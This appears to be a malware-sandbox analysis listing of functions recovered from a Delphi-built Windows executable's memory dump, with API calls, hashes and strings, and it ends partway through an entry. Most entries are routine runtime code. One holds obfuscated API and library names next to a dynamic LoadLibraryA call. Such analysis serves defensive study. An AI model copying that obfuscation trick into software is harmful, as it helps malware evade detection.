                                                                  Function 00606ADC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: ecbe04fde73bee193d0a7b72de749cc9874a89fd528d86f59dc676076a77a520
                                                                  • Instruction ID: 528e98083a0427f583ee3b78d34b5c1355cdf3de2a17f51a606cd5cd7331dfb5
                                                                  • Opcode Fuzzy Hash: ecbe04fde73bee193d0a7b72de749cc9874a89fd528d86f59dc676076a77a520
                                                                  • Instruction Fuzzy Hash: EAE0D8B274021427D328A9588C829F7B25DD798350F40416EBE45C73C2EEB0DEA043E8
                                                                  Function 00606B28 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00607F96,00000000,006081AF,?,?,00000000,00000000), ref: 00606B3B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 5cec4e5afaeaf7eaca505266971298c5afb2efbe419083297d0db2ffeb56b179
                                                                  • Instruction ID: 2538a127b28bf230c487c05fe2e7f249dc592227c9c39867c770b0dc62bb897f
                                                                  • Opcode Fuzzy Hash: 5cec4e5afaeaf7eaca505266971298c5afb2efbe419083297d0db2ffeb56b179
                                                                  • Instruction Fuzzy Hash: 52D05EA634D2503AE228515B6D85DBB9B9DCAC67A0F10403EF648C6242D2408C169371
                                                                  Function 00608A50 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b6decf1d1d02f52841c9f77c5de55f8057d9970dd0da59bebd052367ecff51cd
                                                                  • Instruction ID: 8e12e25e056cb71a3afc59d0f44886ba09b1843c74ae03e0eb158fe747ed93a1
                                                                  • Opcode Fuzzy Hash: b6decf1d1d02f52841c9f77c5de55f8057d9970dd0da59bebd052367ecff51cd
                                                                  • Instruction Fuzzy Hash: C6C01232525608EFD701DB8CD542D8A73FCE704550F100056E004C7611D275BE00C695
                                                                  Function 00608A6C Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1cfc8dc4a528fbbf25044f93a9797f47fa72584d321842d4ebb925aa7f3c2e1e
                                                                  • Instruction ID: 06c4e8a793d4ab25ad989b9b0a09be4f73708adb57caf7c1e801a34a23d219df
                                                                  • Opcode Fuzzy Hash: 1cfc8dc4a528fbbf25044f93a9797f47fa72584d321842d4ebb925aa7f3c2e1e
                                                                  • Instruction Fuzzy Hash: BAC08C3652A208EFD704CB8CE542DCAB3FCEB08620F100097F408C3700E2B5BF008A90
                                                                  Function 00608A40 Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c674b6cdca997e85205c1468a1f0b6fd4ed41847160108e45f4ec15252cf568
                                                                  • Instruction ID: 6c2cb4c646a9b00e64ea07d0a50451ec9922eed192b56962ea4157afcc4061d9
                                                                  • Opcode Fuzzy Hash: 9c674b6cdca997e85205c1468a1f0b6fd4ed41847160108e45f4ec15252cf568
                                                                  • Instruction Fuzzy Hash: CFB012381818C44ECA168704401179177626781710FC53080C0C147A02461849029400
                                                                  Function 00607EE4 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000000,006081AF,?,?,00000000,00000000), ref: 00607F1A
                                                                    • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                  • API String ID: 4232894706-2493093252
                                                                  • Opcode ID: 405970b93d369cb88c6105069f13510f53fd476ac40e868c890e2f5029489c8f
                                                                  • Instruction ID: f84dacb58a5ec69ebe353e46d4ea67f2db6b91476feb507f417b75987f752d9b
                                                                  • Opcode Fuzzy Hash: 405970b93d369cb88c6105069f13510f53fd476ac40e868c890e2f5029489c8f
                                                                  • Instruction Fuzzy Hash: A46160307802499FDB48FBA4DC4169F7BABDF89300F50A478B542AB3C6CA35DE168718
                                                                  Function 00609624 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 122libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00609674
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: EjmgQfplvq`fB$EqffQfplvq`f$Hfqmfo01$Ol`hQfplvq`f$OlbgQfplvq`f$PjyfleQfplvq`f
                                                                  • API String ID: 1029625771-1297955608
                                                                  • Opcode ID: 50a1be8785d472289030787bf25c4f1d7d0ebf42d9f267e51da72cc4393963f9
                                                                  • Instruction ID: 39f62e41613c841c82e5d73a37b016aa8bff7db7b0af8e5ffb24b86a5f561013
                                                                  • Opcode Fuzzy Hash: 50a1be8785d472289030787bf25c4f1d7d0ebf42d9f267e51da72cc4393963f9
                                                                  • Instruction Fuzzy Hash: CB41ED31B902185FDB88EBA4C851ADFB6BEEF48340F504439F541A73C2EA749E018BA4
                                                                  Function 00603868 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00603932,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000), ref: 006038A1
                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 006038A7
                                                                  • GetStdHandle.KERNEL32(000000F5,006038F0,00000002,?,00000000,00000000,?,00603932,?,?,?,?,00000002,006039DE,0060292B,00602973), ref: 006038BC
                                                                  • WriteFile.KERNEL32(00000000,000000F5,006038F0,00000002,?), ref: 006038C2
                                                                  • MessageBoxA.USER32 ref: 006038E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleWrite$Message
                                                                  • String ID: Error$Runtime error at 00000000
                                                                  • API String ID: 1570097196-2970929446
                                                                  • Opcode ID: 0de637ff2df70bf3d24f60879d7482bd274cc52ed5bac0e5d9a1a20b0b58f315
                                                                  • Instruction ID: 2124d88e66a0689c667f87b3bfccbc2f9e17d8888c3032dd70b9ee23f7f0035c
                                                                  • Opcode Fuzzy Hash: 0de637ff2df70bf3d24f60879d7482bd274cc52ed5bac0e5d9a1a20b0b58f315
                                                                  • Instruction Fuzzy Hash: 22F0B470AC439878E7386BA09D0BFAF234F9741F19F14E659B3519C2D1DBA44AC49226
                                                                  Function 00607048 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
                                                                  • LoadStringA.USER32 ref: 00607147
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID: 8S`$P`
                                                                  • API String ID: 3990497365-1792595465
                                                                  • Opcode ID: 89b3f9bb937295af7cd429966be731153e1d714cef756d376cb3c10833ea981d
                                                                  • Instruction ID: c8a1f16859b4dcf090157e96d894a6f6421ab70c159423d212d38e17420c788a
                                                                  • Opcode Fuzzy Hash: 89b3f9bb937295af7cd429966be731153e1d714cef756d376cb3c10833ea981d
                                                                  • Instruction Fuzzy Hash: E6410CB0A4425C9FDB69DB58CC85BDFB7BAAB44300F0440E9A608E7291D774AF848F55
                                                                  Function 00607046 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
                                                                  • LoadStringA.USER32 ref: 00607147
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID: 8S`$P`
                                                                  • API String ID: 3990497365-1792595465
                                                                  • Opcode ID: f9160e2e3aea943f337618f753a94f9a5b8617bef0c3aad1d4f9833616218498
                                                                  • Instruction ID: 65422663e8b175293843514dc2e6730b18d16fd9701fe0644df9e792c6c37fbb
                                                                  • Opcode Fuzzy Hash: f9160e2e3aea943f337618f753a94f9a5b8617bef0c3aad1d4f9833616218498
                                                                  • Instruction Fuzzy Hash: 9D412E70A8425C9FDB69DB58CC85BDFB7FAAB04300F0440E9A608E7291D774AF848F55
                                                                  Function 006071E0 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00607048: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
                                                                    • Part of subcall function 00607048: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
                                                                    • Part of subcall function 00607048: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
                                                                    • Part of subcall function 00607048: LoadStringA.USER32 ref: 00607147
                                                                  • CharToOemA.USER32 ref: 00607217
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 00607234
                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0060723A
                                                                  • GetStdHandle.KERNEL32(000000F4,006072A4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0060724F
                                                                  • WriteFile.KERNEL32(00000000,000000F4,006072A4,00000002,?), ref: 00607255
                                                                  • LoadStringA.USER32 ref: 00607277
                                                                  • MessageBoxA.USER32 ref: 0060728D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 185507032-0
                                                                  • Opcode ID: 6972115aa8794e35d0410798ef050c4773f5b9befd8970058d6dddba8381a8a3
                                                                  • Instruction ID: eb9fee9d3dd4f480ad86a08fe3e3c715f1e52eb9def34b6db25ae0c784218af9
                                                                  • Opcode Fuzzy Hash: 6972115aa8794e35d0410798ef050c4773f5b9befd8970058d6dddba8381a8a3
                                                                  • Instruction Fuzzy Hash: 0B114CB15883466ED358F7A4CC46F9B77EEAB84300F404519B354D60E2DF74E9048B2A
                                                                  Function 00601AA8 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlEnterCriticalSection.KERNEL32(0060B5C4,00000000,00601B9C), ref: 00601AD7
                                                                  • LocalFree.KERNEL32(?,00000000,00601B9C), ref: 00601AE9
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00601B9C), ref: 00601B0D
                                                                  • LocalFree.KERNEL32(00000000,?,00000000,00008000,?,00000000,00601B9C), ref: 00601B5E
                                                                  • RtlLeaveCriticalSection.KERNEL32(0060B5C4,00601BA3,?,00000000,00601B9C), ref: 00601B8C
                                                                  • RtlDeleteCriticalSection.KERNEL32(0060B5C4,00601BA3,?,00000000,00601B9C), ref: 00601B96
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                  • String ID:
                                                                  • API String ID: 3782394904-0
                                                                  • Opcode ID: 8690fb42c9bd25ff62939df394a92059a33dc87e72416101bb119c48be79a6f8
                                                                  • Instruction ID: c74aeac536d04daf1d9aaa2b88ae39994b19cafb1f7c4f4c32481e89d1555f1e
                                                                  • Opcode Fuzzy Hash: 8690fb42c9bd25ff62939df394a92059a33dc87e72416101bb119c48be79a6f8
                                                                  • Instruction Fuzzy Hash: 51213B74AC4244AFD75EEFA8DC56B5BBBE6EB0A300F10A499F5009B3E1D7345940DB14
                                                                  Function 00602F04 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00602F26
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00602F59
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00602F6F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                  • API String ID: 3677997916-4173385793
                                                                  • Opcode ID: 1157a01e19796f37f2b5cc992d638ddb1fe2541e9874435bd59190aab0a157df
                                                                  • Instruction ID: c03fda469428753ecf02ecefcce68b4b7182e76c56f88a0b924b5aea7086ba02
                                                                  • Opcode Fuzzy Hash: 1157a01e19796f37f2b5cc992d638ddb1fe2541e9874435bd59190aab0a157df
                                                                  • Instruction Fuzzy Hash: 3601B5755C030AB9DB15DBE0CC56BFB77BDDB09744F5000A5BA04D65C0E6705A14D798
                                                                  Function 00606D64 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,00606DFB,?,?,00000000), ref: 00606D7C
                                                                    • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00606DFB,?,?,00000000), ref: 00606DAC
                                                                  • EnumCalendarInfoA.KERNEL32(Function_00006CB0,00000000,00000000,00000004), ref: 00606DB7
                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00606DFB,?,?,00000000), ref: 00606DD5
                                                                  • EnumCalendarInfoA.KERNEL32(Function_00006CEC,00000000,00000000,00000003), ref: 00606DE0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                  • String ID:
                                                                  • API String ID: 4102113445-0
                                                                  • Opcode ID: 64468f9e38e86cbae6d5be39c18cfd5a5062b6d04b52a85de6321f918ccf37d8
                                                                  • Instruction ID: 351a49cc6eeb8d263ff2a59df9ed8983b84ceb925ca044530df0050181d320a2
                                                                  • Opcode Fuzzy Hash: 64468f9e38e86cbae6d5be39c18cfd5a5062b6d04b52a85de6321f918ccf37d8
                                                                  • Instruction Fuzzy Hash: 940126757C42486BE319FBB0CC13B5B765FEF85720F510564F600E66C2EA659E1082A9
                                                                  Function 00606E14 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,00606FDE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00606E43
                                                                    • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: eeee$ggg$yyyy
                                                                  • API String ID: 4232894706-1253427255
                                                                  • Opcode ID: b291cb8597261f6514058d5d14fcbabcc4e1ef7db54b89a8c03662ca38e12f5f
                                                                  • Instruction ID: 549bb3956218e062135398211ae85f01a1fb8ae2f528c7acbdc3c2fb8c59784f
                                                                  • Opcode Fuzzy Hash: b291cb8597261f6514058d5d14fcbabcc4e1ef7db54b89a8c03662ca38e12f5f
                                                                  • Instruction Fuzzy Hash: 254103357C82164BD71DAB78C8816BFF7ABDB84300B604569F442D33C6DA70EE16C669
                                                                  Function 00606B8C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000000,00606C9F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00606BA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LocaleThread
                                                                  • String ID: DR`$|R`$Q`
                                                                  • API String ID: 635194068-1853681101
                                                                  • Opcode ID: 06f649347e903f645061d77f2fb1060dac145866f74880fa77775b5ebe0026ea
                                                                  • Instruction ID: 239d570031dca18a3b836607bbb55e997dcfd0203a85c96b2fac2a33e89f6fe5
                                                                  • Opcode Fuzzy Hash: 06f649347e903f645061d77f2fb1060dac145866f74880fa77775b5ebe0026ea
                                                                  • Instruction Fuzzy Hash: B131B471F801085BD708DA95C891BAF77AFDB88310F11447AFA09D73C1DA35ED1187A9
                                                                  Function 00608288 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00608799,00000000,006087AC), ref: 0060828E
                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,00608799,00000000,006087AC), ref: 0060829F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                  • API String ID: 1646373207-3712701948
                                                                  • Opcode ID: 3d83e3763f9cb26a47f97c377c5ba6a369e8466b53bdeef0079a243f54f614f4
